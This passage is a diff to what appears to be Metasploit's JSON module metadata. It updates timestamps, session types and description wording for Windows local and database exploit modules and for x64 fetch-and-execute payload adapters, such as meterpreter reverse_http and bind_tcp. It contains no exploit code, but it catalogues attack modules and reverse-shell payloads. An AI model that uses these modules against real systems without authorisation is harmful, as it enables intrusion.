"ref_name": "windows/local/cve_2020_17136",
|
||||
@@ -170687,7 +171028,7 @@
|
||||
"targets": [
|
||||
"Windows 10 x64 RS1 (build 14393) and RS5 (build 17763)"
|
||||
],
|
||||
"mod_time": "2023-06-16 08:32:41 +0000",
|
||||
"mod_time": "2024-02-07 11:28:00 +0000",
|
||||
"path": "/modules/exploits/windows/local/cve_2021_40449.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "windows/local/cve_2021_40449",
|
||||
@@ -170876,7 +171217,7 @@
|
||||
"targets": [
|
||||
"Windows 11"
|
||||
],
|
||||
"mod_time": "2023-06-16 08:32:41 +0000",
|
||||
"mod_time": "2024-02-07 11:30:42 +0000",
|
||||
"path": "/modules/exploits/windows/local/cve_2022_26904_superprofile.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "windows/local/cve_2022_26904_superprofile",
|
||||
@@ -180315,7 +180656,7 @@
|
||||
"targets": [
|
||||
"Automatic"
|
||||
],
|
||||
"mod_time": "2023-12-12 09:53:37 +0000",
|
||||
"mod_time": "2024-02-13 13:00:38 +0000",
|
||||
"path": "/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "windows/mssql/lyris_listmanager_weak_pass",
|
||||
@@ -180643,7 +180984,7 @@
|
||||
"targets": [
|
||||
"Automatic"
|
||||
],
|
||||
"mod_time": "2023-12-12 09:53:37 +0000",
|
||||
"mod_time": "2024-02-13 13:00:38 +0000",
|
||||
"path": "/modules/exploits/windows/mssql/mssql_linkcrawler.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "windows/mssql/mssql_linkcrawler",
|
||||
@@ -180697,7 +181038,7 @@
|
||||
"targets": [
|
||||
"Automatic"
|
||||
],
|
||||
"mod_time": "2022-06-29 19:10:52 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/exploits/windows/mssql/mssql_payload.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "windows/mssql/mssql_payload",
|
||||
@@ -180706,8 +181047,13 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": null
|
||||
"session_types": [
|
||||
"mssql"
|
||||
],
|
||||
"needs_cleanup": null,
|
||||
"actions": [
|
||||
|
||||
]
|
||||
},
|
||||
"exploit_windows/mssql/mssql_payload_sqli": {
|
||||
"name": "Microsoft SQL Server Payload Execution via SQL Injection",
|
||||
@@ -180798,7 +181144,7 @@
|
||||
"targets": [
|
||||
"MySQL on Windows prior to Vista"
|
||||
],
|
||||
"mod_time": "2023-08-17 19:07:28 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/exploits/windows/mysql/mysql_mof.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "windows/mysql/mysql_mof",
|
||||
@@ -180807,8 +181153,13 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": true
|
||||
"session_types": [
|
||||
"mysql"
|
||||
],
|
||||
"needs_cleanup": true,
|
||||
"actions": [
|
||||
|
||||
]
|
||||
},
|
||||
"exploit_windows/mysql/mysql_start_up": {
|
||||
"name": "Oracle MySQL for Microsoft Windows FILE Privilege Abuse",
|
||||
@@ -180842,7 +181193,7 @@
|
||||
"targets": [
|
||||
"MySQL on Windows"
|
||||
],
|
||||
"mod_time": "2023-08-17 19:07:28 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/exploits/windows/mysql/mysql_start_up.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "windows/mysql/mysql_start_up",
|
||||
@@ -180851,8 +181202,13 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": true
|
||||
"session_types": [
|
||||
"mysql"
|
||||
],
|
||||
"needs_cleanup": true,
|
||||
"actions": [
|
||||
|
||||
]
|
||||
},
|
||||
"exploit_windows/mysql/mysql_yassl_hello": {
|
||||
"name": "MySQL yaSSL SSL Hello Message Buffer Overflow",
|
||||
@@ -181937,7 +182293,7 @@
|
||||
"Windows x86",
|
||||
"Windows x64"
|
||||
],
|
||||
"mod_time": "2021-08-20 16:06:16 +0000",
|
||||
"mod_time": "2024-02-14 15:26:34 +0000",
|
||||
"path": "/modules/exploits/windows/postgres/postgres_payload.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "windows/postgres/postgres_payload",
|
||||
@@ -181946,8 +182302,13 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": true
|
||||
"session_types": [
|
||||
"postgresql"
|
||||
],
|
||||
"needs_cleanup": true,
|
||||
"actions": [
|
||||
|
||||
]
|
||||
},
|
||||
"exploit_windows/proxy/bluecoat_winproxy_host": {
|
||||
"name": "Blue Coat WinProxy Host Header Overflow",
|
||||
@@ -185380,7 +185741,7 @@
|
||||
"MOF upload",
|
||||
"Command"
|
||||
],
|
||||
"mod_time": "2023-11-24 14:30:40 +0000",
|
||||
"mod_time": "2024-02-02 14:26:43 +0000",
|
||||
"path": "/modules/exploits/windows/smb/psexec.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "windows/smb/psexec",
|
||||
@@ -185390,7 +185751,7 @@
|
||||
"notes": {
|
||||
},
|
||||
"session_types": [
|
||||
"SMB"
|
||||
"smb"
|
||||
],
|
||||
"needs_cleanup": null,
|
||||
"actions": [
|
||||
@@ -200083,7 +200444,7 @@
|
||||
"bwatters-r7",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200093,7 +200454,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/custom/bind_ipv6_tcp",
|
||||
@@ -200126,7 +200487,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200136,7 +200497,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/custom/bind_ipv6_tcp_uuid",
|
||||
@@ -200168,7 +200529,7 @@
|
||||
"bwatters-r7",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200178,7 +200539,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/custom/bind_named_pipe",
|
||||
@@ -200210,7 +200571,7 @@
|
||||
"bwatters-r7",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nCustom shellcode stage.\n\nListen for a connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200220,7 +200581,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/custom/bind_tcp",
|
||||
@@ -200257,7 +200618,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nCustom shellcode stage.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200267,7 +200628,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/custom/bind_tcp_rc4",
|
||||
@@ -200300,7 +200661,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200310,7 +200671,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/custom/bind_tcp_uuid",
|
||||
@@ -200342,7 +200703,7 @@
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200352,7 +200713,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/custom/reverse_http",
|
||||
@@ -200386,7 +200747,7 @@
|
||||
"agix",
|
||||
"rwincey"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200396,7 +200757,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/custom/reverse_https",
|
||||
@@ -200428,7 +200789,7 @@
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200438,7 +200799,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/custom/reverse_named_pipe",
|
||||
@@ -200470,7 +200831,7 @@
|
||||
"bwatters-r7",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200480,7 +200841,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/custom/reverse_tcp",
|
||||
@@ -200517,7 +200878,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nCustom shellcode stage.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200527,7 +200888,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/custom/reverse_tcp_rc4",
|
||||
@@ -200560,7 +200921,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200570,7 +200931,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/custom/reverse_tcp_uuid",
|
||||
@@ -200602,7 +200963,7 @@
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200612,7 +200973,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/custom/reverse_winhttp",
|
||||
@@ -200644,7 +201005,7 @@
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200654,7 +201015,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/custom/reverse_winhttps",
|
||||
@@ -200686,7 +201047,7 @@
|
||||
"Matt Graeber",
|
||||
"Shelby Pace"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200696,7 +201057,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/encrypted_shell/reverse_tcp",
|
||||
@@ -200728,7 +201089,7 @@
|
||||
"Matt Graeber",
|
||||
"Shelby Pace"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to attacker and spawn an encrypted command shell",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn an encrypted command shell",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200738,7 +201099,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/encrypted_shell_reverse_tcp",
|
||||
@@ -200767,7 +201128,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nExecute an arbitrary command (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nExecute an arbitrary command (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200777,7 +201138,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/exec",
|
||||
@@ -200807,7 +201168,7 @@
|
||||
"scriptjunkie",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nLoad an arbitrary x64 library path",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nLoad an arbitrary x64 library path",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200817,7 +201178,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/loadlibrary",
|
||||
@@ -200846,7 +201207,7 @@
|
||||
"Brendan Watters",
|
||||
"pasta <jaguinaga@infobytesec.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nSpawn a dialog via MessageBox using a customizable title, text & icon",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a dialog via MessageBox using a customizable title, text & icon",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200856,7 +201217,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/messagebox",
|
||||
@@ -200887,7 +201248,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -200898,7 +201259,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter/bind_ipv6_tcp",
|
||||
@@ -200931,7 +201292,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -200942,7 +201303,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter/bind_ipv6_tcp_uuid",
|
||||
@@ -200976,7 +201337,7 @@
|
||||
"OJ Reeves",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for a pipe connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -200987,7 +201348,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter/bind_named_pipe",
|
||||
@@ -201020,7 +201381,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for a connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201031,7 +201392,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter/bind_tcp",
|
||||
@@ -201068,7 +201429,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201079,7 +201440,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter/bind_tcp_rc4",
|
||||
@@ -201112,7 +201473,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201123,7 +201484,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter/bind_tcp_uuid",
|
||||
@@ -201156,7 +201517,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201167,7 +201528,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter/reverse_http",
|
||||
@@ -201203,7 +201564,7 @@
|
||||
"agix",
|
||||
"rwincey"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201214,7 +201575,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter/reverse_https",
|
||||
@@ -201247,7 +201608,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker via a named pipe pivot",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker via a named pipe pivot",
|
||||
"references": [
|
||||
